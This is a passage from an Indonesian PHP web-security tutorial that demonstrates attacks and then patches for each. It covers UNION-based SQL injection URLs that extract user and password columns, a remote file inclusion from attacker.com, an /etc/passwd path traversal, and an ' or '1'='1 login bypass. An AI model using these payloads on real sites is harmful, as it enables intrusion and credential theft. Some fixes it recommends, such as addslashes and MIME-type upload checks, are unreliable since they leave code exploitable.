Query ini berfungsi untuk menampilkan isi dari table `tables` yang ada pada database information_schema yang mana nama databasenya = database(), funsi database() akan menghasilkan nama database yang digunakan oleh website.


Setelah nama2 table diketahui, kita akan coba menampilkan nama2 colomn yang ada pada table. Misal nama table yang akan kita tampilkan isi kolomnya `tbluser`


http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name = tbluser


Jika cara ini gagal, sebelumnya ubah dulu kata `tbluser` ke bentuk hexa, gunakan website2 yang menyediakan jasa convert text ke hexa.


http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name = tbluser




Jika cara ini gagal, sebelumnya ubah kata `tbluser` ke bentuk hexa.


http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(column_name), 3, 4 from information_schema.columns where table_name = 0x6164A689 (ni hexa yang aku pake ngawur, heheh ntar coba sendiri aja)


Setelah keluar nama2 colomn dari tabel `tbluser`, kita lanjutkan untuk menampilkan record dari tabel ini.


Misal colomn2 yang tampil


id, user, email, password


http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(user, 0×3a, password), 3, 4 from tbluser


Kita tampilkan yang penting2 saja……


Selanjutnya isi tabel akan ditampilkan, dan setelah kita dapatkan user dan password admin. Kita cari tempat untuk melakukan login ke system dan Eng ing eng, akses kita menjadi Administrator pada website.



PENANGKAL


Teknik serangan yang panjang lebar ini ternyata hanya memerlukan sedikit tambahan code untuk menambalnya, benarkah??? ya…. Mari kita bahas.



$result = mysql_query (”select * from `tblBerita` wheere `id` = $id “);


Serangan ini dapat terjadi dikarenakan tidak ada filter pada get_variable, sehingga attacker dapat menambahkan query jahat pada query aslinya. hehehe, nilai yang dibutuhkan pada get_variable id hanya nilai numeric saja sehingga kita dapat melakukan pengecekan apakah nilainya angka valid atau tidak


if (!is_numeric($id))


$id = 0;


$result = mysql_query (”select * from `tblBerita` where `id` = $id “);



Kode ini, berguna untuk merubah nilai id menjadi 0 (Nol) jika nilai id tidak valid sebagai angka.


Huft, sudah kok itu aja……. heheheeh…….


3. LFI / RFI


LFI (Local File Inclusion) Bug yang memungkinkan sang attacker untuk menampilkan file2 yang ada pada server.


RFI (Remote File Inclusion) Bug yang memungkinkan sang attacker untuk mengincludekan file dari luar server. B


Bug ini dapat terjadi ketika setting konfigurasi php di server


allow_url_include = on


allow_url_fopen = on


magic_quote_gpc = off



Bug ini terjadi karena kesalahan dalam penggunaan function include(), include_once(), require(), require_once()


Misal


http://www.target.com/index.php?page=news


Selanjutnya pada code kita langsung melakukan include pada halaman yang di kirim melalui variable pada url


$page = $_GET['page'];


include($page.”.php”);


Contoh serangan


http://www.target.com/index.php?page=http://www.attacker.com/filejahat.txt?? <– RFI



http://www.target.com/index.php?page=../../../../etc/passwd <– LFI


PENANGKAL


Baiknya kita berlaku lakukan pengecekan pada setiap halaman yang akan kita tampilkan dengan menggunakan function ini misal


<?php


$page = $_GET['page'];


if ($page == ‘news’)


include(”news.php”);


elseif ($page == ‘tutorial’)



include(”tutorial.php”);


?>


Dan selanjutnya, hmmm ternyata kesalahan yang sederhana benar2 dapat menyebabkan kejadian yang fatal.


Next…


4. Bypass Login


Teknik ini sebenarnya juga merupakan bentuk lain dari SQLInjection Contoh


Pada halaman login user diminta untuk menginputkan User dan password


user : admin


password : pass123



Selanjutnya pada query


<?php


include “‘connect.php”;


mysql_select_db (”db_web”, $con);


$user = $_GET['user'];


$pass = $_GET['password'];


$result = mysql_query (”select * from `tbladmin` where `uname` = ‘$user’ and `upass` = ‘$pass’ “);


dan seterusnya


?>



Jika kita terjemahkan


“select * from `tbladmin` where `uname` = ‘admin’ and `upass` = ‘pass123′


Ok bentuk2 bypass yang dapat digunakan


‘ or ‘1′=’1


Coba kalau kita ubah isian user dan passwordnya


user : admin


password : pass123′ or ‘1′=’1


Query SQLnya akan berubah menjadi


“select * from `tbladmin` where `uname` = ‘admin’ and `upass` = ‘pass123′ or ‘1′=’1′



Ow ow ow, dengan cara ini tanpa sang attacker tau dengan password adminnya pun dia tetap bisa melakkan login ke system. Sungguh sangat berbahaya kan.


PENANGKAL


Untuk menangkal serangan ini kita dapat menggunakan function addslashes() yang ada pada php


string addslashes(string $str), fungsinya untuk mengembalikan karakter dengan backslash (\) untuk karakter2 yang memerlukan penanda khusu pada query sql


‘ menjadi \’





Contoh



<?php


include “‘connect.php”;


mysql_select_db (”db_web”, $con);


$user = addslashes($_GET['user']);


$pass = addslashes($_GET['password']);


$result = mysql_query (”select * from `tbladmin` where `uname` = ‘$user’ and `upass` = ‘$pass’ “);


dan seterusnya



?>


Fungsi lain, mysqli_real_escape_string(), htmlspecialchars() dll


5. Filter Upload file


Filter file upload, kesalahan pada fitur ini dapat menyebabkan website yang kita miliki dapat dikuasai oleh seorang attacker jika tidak adanya filter yang benar pada file dengan tipe apa saja yang dapat masuk ke dalam di upload. Begini prosesnya…


Attacker akan meng-Upload file Backdoor, script jahat atau yang lain untuk dapat menjalankan script tersebut secara langsung pada server. Attacker akan dapat mengakses database website dengan melihat konfigurasi database yang ada pada file config, melakukan edit file atau bahkan melakukan Deface (Mengganti halaman depan website)


PENANGKAL


Lakukan pengecekan pada tipe file sebelum melakukan eksekusi upload file ke server


<?php


$image = $_FILES['image']['name'];


$imagetipe = $_FILES['image']['type'];

if ($image<>” && !(($imagetipe == “image/gif”)

|| ($imagetipe == “image/jpeg”)

|| ($imagetipe == “image/bmp”)

|| ($imagetipe == “image/jpg”)


|| ($imagetipe == “image/png”))){

echo “<script>alert(’Images Tidak Valid!! Image Yang diijinkan adalah PNG, GIF dan JPG’);</script>”;


}else {


Kode upload file ………


}


?>


Dengan kode diatas website hanya mengijinkan file bertipe gif, bmp, jpg dan jpeg saja yang dapat diupload.


FINISH


Ok, sekian terima kasih telah menyempatkan untuk membaca tutorial saya ini Moga bermanfaat bagi para pengembang website yang sedang mencari informasi tentang teknik patching ini, sengaja saya jelaskan pula teknik serangannya agar para pengembang website juga dapat tau dengan jelas penyebab terjadinya serangan-sernagan itu… Selanjutnya melakukan penambalan pada script2 yang salah dengan cara yang saya sarankan atau dengan cara lain sesuai kreatifitas masing2….


Sekali lagi terima kasih, Wassalamualaikum wr, wb….




Sumber : http://agoesdoubleb.i-bego.com/?p=216